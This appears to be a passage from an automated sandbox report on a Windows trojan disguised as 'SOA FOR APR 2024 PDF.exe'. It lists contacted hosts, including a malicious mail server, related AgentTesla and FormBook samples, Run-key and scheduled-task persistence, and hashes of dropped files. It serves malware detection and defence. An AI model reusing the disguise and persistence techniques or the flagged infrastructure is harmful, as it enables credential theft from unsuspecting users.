                                http://x1.i.lencr.org/0SOA FOR APR 2024 PDF.exe, 00000009.00000002.3326899826.0000000006497000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3275075106.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000296A000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000351E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006AA9000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001713000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3322622943.00000000066A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://r3.i.lencr.org/0SOA FOR APR 2024 PDF.exe, 00000009.00000002.3326899826.0000000006497000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3275075106.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3358769112.0000000008990000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000296A000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000351E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006AA9000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001751000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001713000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                104.26.12.205
                                		api.ipify.orgUnited States
                                		13335CLOUDFLARENETUSfalse
                                50.87.195.61
                                		mail.fascia-arch.comUnited States
                                		46606UNIFIEDLAYER-AS-1UStrue

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1432007
                                Start date and time:2024-04-26 09:01:05 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 10m 32s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:SOA FOR APR 2024 PDF.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@33/20@2/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 414
                                • Number of non-executed functions: 32
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                09:01:52API Interceptor1545495x Sleep call for process: SOA FOR APR 2024 PDF.exe modified
                                09:01:56Task SchedulerRun new task: eeBIYZL path: C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                09:01:56API Interceptor26x Sleep call for process: powershell.exe modified
                                09:01:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                09:01:59API Interceptor204478x Sleep call for process: eeBIYZL.exe modified
                                09:02:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                09:02:09API Interceptor978557x Sleep call for process: BjTxJte.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                104.26.12.205Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                • api.ipify.org/?format=json
                                Sky-Beta.exeGet hashmaliciousStealitBrowse
                                • api.ipify.org/?format=json
                                SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                • api.ipify.org/
                                lods.cmdGet hashmaliciousRemcosBrowse
                                • api.ipify.org/
                                50.87.195.61vbc.exeGet hashmaliciousFormBookBrowse
                                • www.vegrebel.com/nnmd/?VRNp=wBZl4vkh1&MvdD=iedGY0/hYfrjbbwxufAPjCijJp09b4Pnd9RoleXu3W9ZUfsJsAn0SGbENHPecaFD81L2
                                SWIFT COPY_PDF.exeGet hashmaliciousFormBookBrowse
                                • www.smguidetowkw.com/m2be/?Et5pFP9=GRobwBHqsz/I/K6QMyhqlyyiibK6nxcxU5TpJro9yIpA+ftqAp39OLT0oN0WcJ2Wu53Xy7WDvg==&uDKLJ=D48t

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                mail.fascia-arch.comDHL STATEMENT OF ACCOUNT - 1003657363.exeGet hashmaliciousAgentTeslaBrowse
                                • 50.87.195.61
                                PO.exeGet hashmaliciousAgentTeslaBrowse
                                • 50.87.195.61
                                IOJMZilMeH.exeGet hashmaliciousAgentTeslaBrowse
                                • 50.87.195.61
                                PO#7A68D20.exeGet hashmaliciousAgentTeslaBrowse
                                • 50.87.195.61
                                api.ipify.orgPayment Swift.docGet hashmaliciousAgentTeslaBrowse
                                • 172.67.74.152
                                https://lide.alosalca.fun/highbox#joeblow@xyz.comGet hashmaliciousHTMLPhisherBrowse
                                • 104.26.13.205
                                http://asana.wfGet hashmaliciousUnknownBrowse
                                • 172.67.74.152
                                o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                • 172.67.74.152
                                http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                • 104.26.12.205
                                16770075581.zipGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • 104.26.12.205
                                SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • 104.26.12.205
                                SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • 104.26.12.205
                                Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.13.205
                                Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • 104.26.12.205

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUShttp://householdshop.club/Get hashmaliciousUnknownBrowse
                                • 104.17.25.14
                                http://xred.site50.net/syn/SSLLibrary.dllGet hashmaliciousUnknownBrowse
                                • 1.1.1.1
                                http://tracking.theimpco.com/tracking/click?d=OrpweRVshItmHO3qVpYwg0JJ3qp4iuwmt5687ge2H9uFpmeuDd2X4dPYczAnrgigX6DFu-Km6YtBvUpjEWnC0qAPektAg_1gGuxaDYDl5nf8rOcHvuOtOBIWknNeVHzB3g2Get hashmaliciousUnknownBrowse
                                • 1.1.1.1
                                http://cleverchoice.com.auGet hashmaliciousUnknownBrowse
                                • 104.18.28.104
                                http://cleverchoice.com.auGet hashmaliciousUnknownBrowse
                                • 104.18.28.104
                                http://cleverchoice.com.auGet hashmaliciousUnknownBrowse
                                • 104.18.28.104
                                Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                • 172.67.191.112
                                http://callumsyed.net/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                • 104.17.2.184
                                DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 172.67.142.245
                                https://therufus.org/download.phpGet hashmaliciousUnknownBrowse
                                • 104.21.65.18
                                UNIFIEDLAYER-AS-1USINQ No. HDPE-16-GM-00- PI-INQ-3001.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                • 162.240.81.18
                                DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 192.232.216.145
                                DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 192.232.216.145
                                DOC-Zcns1G_.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 192.232.216.145
                                https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                • 192.185.214.24
                                https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                • 162.241.120.242
                                https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                • 162.241.120.242
                                https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                • 162.241.120.242
                                https://pub-02d879d6055b4f31b3db7cbbb1499011.r2.dev/%60%60~~~%5D%5D%5D%5D%5D.html#theunis@khk.co.zaGet hashmaliciousHTMLPhisherBrowse
                                • 162.241.27.10
                                https://content.amanet.org/?m=CiGW.81UwlU3LD6ZH5M4ZoUXv03dAeWfC&r=https://control.mailblaze.com/index.php/survey/ps97367sjy584Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                • 162.241.114.35

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0eDHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                • 104.26.12.205
                                PO-inv-CQV20(92315).exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                a.cmdGet hashmaliciousUnknownBrowse
                                • 104.26.12.205
                                http://papajoeschicago.comGet hashmaliciousUnknownBrowse
                                • 104.26.12.205
                                https://www.bing.com/ck/a?!&&p=8c604c2d3901cb1eJmltdHM9MTcxMjc5MzYwMCZpZ3VpZD0wODdjNjgyYy00N2ZlLTYyOGQtMzA1ZC03YmVmNDY5NTYzNjUmaW5zaWQ9NTE2MQ&ptn=3&ver=2&hsh=3&fclid=087c682c-47fe-628d-305d-7bef46956365&u=a1aHR0cHM6Ly9rZWljb3NlY3VyaXR5LmNvbS5teC8&ntb=1Get hashmaliciousUnknownBrowse
                                • 104.26.12.205
                                o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                • 104.26.12.205
                                https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==Get hashmaliciousHTMLPhisherBrowse
                                • 104.26.12.205
                                http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                • 104.26.12.205
                                Isass.exeGet hashmaliciousUnknownBrowse
                                • 104.26.12.205
                                https://itniy4gbb.cc.rs6.net/tn.jsp?f=001DpCT81a7BIE926OduG6KmKkwKebSAbUZq28C52DoY-FfQJyM_2Gq3l18V1j7KWwJQTfGlQ_HSq0vC8xqJqFST9z0CwmpWgUieBjKckdJcSODJ_3vu5MzvaSoOGbGY9SjpWQtg9-aAXm1e6VV91z84Q2_wlyDMR98&c=i37ZFF5Dy2QSFqOfb2TVpr5vkMFqaR6DdoQbIhzcRV7G2oFwX8NEvA==&ch=2ErEiCYnoykaXa1uoD0AgTD1vOpSqc6zh3ef32Gb4XR_ut8_qvmzHA==&c=&ch=&__=/mrlZp0zmTKgGvsPpx0JUyCMjGZr4J6/Z2dvbnphbGV6c2FsYXNAc2FuaXRhcy5lcw==Get hashmaliciousHTMLPhisherBrowse
                                • 104.26.12.205

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BjTxJte.exe.log

                                Download File
                                Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SOA FOR APR 2024 PDF.exe.log

                                Download File
                                Process:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eeBIYZL.exe.log

                                Download File
                                Process:C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.380805901110357
                                Encrypted:false
                                SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//8M0Uyus:lGLHxvCsIfA2KRHmOugw1s
                                MD5:B11E25ABF5BF7766D7D7437596AFFED0
                                SHA1:D673CFF28D1C21A672BFE165614629B2BB23DE93
                                SHA-256:EE402CA8A7E7FA1F95CD644AFE756C8AF734E810797FD3E9C6762FCC2510F3F6
                                SHA-512:D4C19BF1948BCF50899840F4B670ECF7510D65597054A89963D3155DB3869E65F2ABA2F6CE9C9E5F18890A65719E514E1D1EC6394EF99DF21E60F8220FA157C4
                                Malicious:false
                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ibc5ldv.n1m.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3y3jasax.ltn.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmva4iqf.d3n.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dr0amdqh.h0i.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqn0tmik.0o2.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1hmvqm3.j5f.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

